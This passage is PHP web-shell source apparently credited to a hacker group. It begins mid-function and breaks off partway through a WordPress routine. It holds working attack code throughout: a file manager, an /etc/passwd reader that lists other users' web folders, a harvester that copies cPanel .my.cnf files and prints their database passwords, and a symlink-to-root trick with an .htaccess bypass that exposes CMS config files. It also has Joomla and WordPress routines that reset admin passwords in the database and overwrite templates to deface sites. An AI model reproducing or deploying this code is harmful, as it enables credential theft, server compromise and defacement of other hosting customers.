- if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
- echo "<tr>
- <td><a href=\"?path=$path/$dir\">$dir</a></td>
- <td><center>--</center></td>
- <td><center>";
- if(is_writable("$path/$dir")) echo '<font color="green">';
- elseif(!is_readable("$path/$dir")) echo '<font color="blue">';
- echo perms("$path/$dir");
- if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$path\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"dir\">
- <input type=\"hidden\" name=\"name\" value=\"$dir\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
- <input type=\"submit\" value=\">\" />
- </form></center></td>
- </tr>";
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file("$path/$file")) continue;
- $size = filesize("$path/$file")/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo "<tr>
- <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
- <td><center>".$size."</center></td>
- <td><center>";
- if(is_writable("$path/$file")) echo '<font color="green">';
- elseif(!is_readable("$path/$file")) echo '<font color="blue">';
- echo perms("$path/$file");
- if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$path\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- <option value=\"edit\">Edit</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"file\">
- <input type=\"hidden\" name=\"name\" value=\"$file\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
- <input type=\"submit\" value=\">\" />
- </form></center></td>
- </tr>";
- }
- echo '</table>
- </div></tr>';
- }
- echo '
- </BODY>
- </HTML>';
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'salto')) {
- ?>
- <form action="?&idb=salto" method="post">
- <?php
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd) { die('<b>[+] ERROR | GA BISA BACA /etc/passwd [+]</b>'); }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if ($i > 10)
- {
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != ''))
- {
- if (is_readable($dirz))
- {
- array_push($users,$username);
- array_push($pub,$dirz);
- }
- }
- }
- $i++;
- }
- echo '<br><br>';
- echo "<center><b>[+] KETEMU ".sizeof($pub)." MAHO"." [+]</b><br/><br/>";
- foreach ($users as $user)
- {
- $path = "/home/$user/public_html/";
- echo "<a href='?y=$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</a><br>";
- }
- echo "<br>";
- echo '</center></body></html>';
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'cp')) {
- ?>
- <form action="?&idb=cp" method="post">
- <?php
- /**
- * @author: FaisaL Ahmed aka blue X
- * @mail: me@faialahmed.me
- * @Screenshot: http://prntscr.com/7c1p34
- * @Last Updated: 01 June 2015
- */
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- echo "<center>";
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }
- }
- }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- }
- }else{
- echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
- }
- echo "</body></html>";
- }
- ?>
- <?
- ####################################################
- #####V1ru5 v1.0 ############
- #####CODED by S1r_V1ru5 ############
- #####V1ru5 Group Cyber Army ############
- ####################################################
- set_time_limit(0);
- error_reporting(0);
- function openBaseDir()
- {
- $openBaseDir = ini_get("open_basedir");
- if (!$openBaseDir)
- {
- $openBaseDir = '<font color="green">OFF</font>';
- }
- else
- {
- $openBaseDir = '<font color="blue">ON</font>';
- }
- return $openBaseDir;
- }
- ##.htaccess
- @mkdir('empek',0777);
- @symlink("/","empek/amis");
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("empek/.htaccess",$htaccss);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- ##Symlink to the amis
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- error_reporting(0);
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"empek/".$etcc[0].'-PhpBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"empek/".$etcc[0].'-vBulletin.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"empek/".$etcc[0].'-IPB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"empek/".$etcc[0].'-MyBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"empek/".$etcc[0].'-SMF.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"empek/".$etcc[0].'-Drupal.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"empek/".$etcc[0].'-e107.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"empek/".$etcc[0].'-Seditio.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"empek/".$etcc[0].'-osCommerce.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
- }
- #####################
- if(isset($_REQUEST['do'])){
- switch ($_REQUEST['do']){
- ###################################CASE: var_named
- case 'var_named':
- if(is_readable("/var/named")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- }else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
- break;
- #####################END
- ###########CASE: /etc/passwd
- case 'etc_passwd':
- error_reporting(0);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- if(is_readable("/etc/passwd")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
- $list = scandir("/var/named");
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $etcc[0])
- {
- $i += 1;
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }}}}
- echo "<center>Total Domains Found: ".$i."</center><br />";}
- break;
- #########################END
- ########CASE: etc_named.conf
- case 'etc_named.conf':
- if(is_readable("/etc/named.conf")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){
- $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
- break;
- ##################################END
- #############CASE etc_valiases
- case 'etc_valiases':
- if(is_readable("/etc/valiases")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $list = scandir("/etc/valiases");
- foreach($list as $domain){
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
- break;
- ############END
- ##########CASE posix
- case 'posix':
- echo <<<empek
- <form method='POST'>
- <br><br>Input Limit<br>
- <input size='20' value='0' name='min' type='text'>
- to
- <input size='20' value='1024' name='max' type='text'>
- <br>
- <input value='SYMLINK' name='' type='submit'><br><br>
- </form>
- empek;
- if($_POST){
- $min = $_POST['min'];
- $max = $_POST['max'];
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $p = 0;
- error_reporting(0);
- $list = scandir("/var/named");
- for($p = $min; $min <= $max; $p++)
- {
- $user = posix_getpwuid($p);
- if(is_array($user)){
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $user['name'])
- {
- $i += 1;
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$user['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }
- }
- }
- }
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- }
- break;
- #################END
- }
- }
- ?>
- <?php
- // getting info from inside :)
- function tunisia($text,$bideya,$niheya,$i=1){
- $ar0=explode($bideya, $text);
- $ar1=explode($niheya, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '';
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- // joomla index changer
- function index_changer_joomla($conf, $content, $domain) {
- $doler = '$';
- $username = tunisia($conf, $doler."user = '", "';");
- $password = tunisia($conf, $doler."password = '", "';");
- $dbname = tunisia($conf, $doler."db = '", "';");
- $prefix = tunisia($conf, $doler."dbprefix = '", "';");
- $host = tunisia($conf, $doler."host = '","';");
- $co=randomt();
- $site_url = "http://".$domain."/administrator";
- $output = '';
- $cond = 0;
- $link=mysql_connect($host, $username, $password);
- if($link) {
- mysql_select_db($dbname,$link) ;
- $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '71a4d4cd2f30b185d707718273b17d05', `usertype` = 'Super Administrator', `block` = 0");
- $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
- } else {
- $output.= "[-] DB Error<br />";
- }
- if($req1){
- if ($req) {
- $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
- $data = mysql_fetch_array($req);
- $template_name = $data["template"];
- $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
- $data = mysql_fetch_array($req);
- $template_id = $data["extension_id"];
- $url2=$site_url."/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $return = tunisia($buffer ,'<input type="hidden" name="return" value="','"');
- $hidden = tunisia($buffer ,'<input type="hidden" name="','" value="1"',4);
- if($return && $hidden) {
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_REFERER, $url2);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- $output.= "[-] Login Error<br />";
- } else {
- $output.= "[+] Login Successful<br />";
- }
- }
- if($pos){
- $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',2);
- if($hidden2) {
- $output.= "[+] index.php file found in Theme Editor<br />";
- } else {
- $output.= "[-] index.php Not found in Theme Editor<br />";
- }
- }
- if($hidden2) {
- $url2=$site_url."/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<dd class="message message">');
- $cond = 0;
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Template successfully saved<br />";
- $cond = 1;
- }
- }
- }
- else {
- $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$site_url."/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden=tunisia($buffer ,'<input type="hidden" name="','" value="1"',3);
- if($hidden) {
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=jancok&option=com_login&task=login&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- $output.= "[-] Login Error<br />";
- } else {
- $output.= "[+] Login Successful<br />";
- }
- }
- if($pos) {
- $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',6);
- if($hidden2) {
- $output.= "[+] index.php file founded in Theme Editor<br />";
- } else {
- $output.= "[-] index.php Not found in Theme Editor<br />";
- }
- }
- if($hidden2) {
- $url2=$site_url."/index.php?option=com_templates&layout=edit";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<dd class="message message fade">');
- $cond = 0;
- if($pos === false) {
- $output.= "[-] Updating Index.php Error<br />";
- } else {
- $output.= "[+] Index.php Template successfully saved<br />";
- $cond = 1;
- }
- }
- }
- } else {
- $output.= "[-] DB Error<br />";
- }
- global $base_path;
- unlink($base_path.$co);
- return array('cond'=>$cond, 'output'=>$output , 'template'=>$template_name);
- }
- // wordpress index changer
- function index_changer_wp($conf, $index) {
- $dol = '$';
- $preindex = "<?php
- ".$dol."def = file_get_contents('".$index."');
- ".$dol."p = explode('public_html',dirname(__FILE__));
- ".$dol."p = ".$dol."p[0].'public_html';
- if (".$dol."handle = opendir(".$dol."p)) {
- ".$dol."p1 = @fopen(".$dol."p.'/index.html','w+');
- @fwrite(".$dol."fp1, ".$dol."def);
- ".$dol."p1 = @fopen(".$dol."p.'/index.php','w+');
- @fwrite(".$dol."fp1, ".$dol."def);
- ".$dol."fp1 = @fopen(".$dol."p.'/index.htm','w+');
- @fwrite(".$dol."fp1, ".$dol."def);
- echo 'Done';
- }
- closedir(".$dol."handle);
- unlink(__FILE__);
- ?>";
- $content = base64_encode($preindex);
- $output = '';
- $dol = '$';
- $go = 0;
- $username = tunisia($conf,"define('DB_USER', '","');");
- $password = tunisia($conf,"define('DB_PASSWORD', '","');");
- $dbname = tunisia($conf,"define('DB_NAME', '","');");
- $prefix = tunisia($conf,$dol."table_prefix = '","'");
- $host = tunisia($conf,"define('DB_HOST', '","');");
- $link=mysql_connect($host,$username,$password);
- if($link) {
- mysql_select_db($dbname,$link) ;
- $dol = '$';
- $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '71a4d4cd2f30b185d707718273b17d05' WHERE `ID` = 1");
- } else {
- $output.= "[-] DB Error<br />";
- }
- if($req1) {
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
- $data = mysql_fetch_array($req);
- $template = $data["option_value"];
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
- $data = mysql_fetch_array($req);
- $current_theme = $data["option_value"];
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$site_url."/wp-login.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=jancok&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
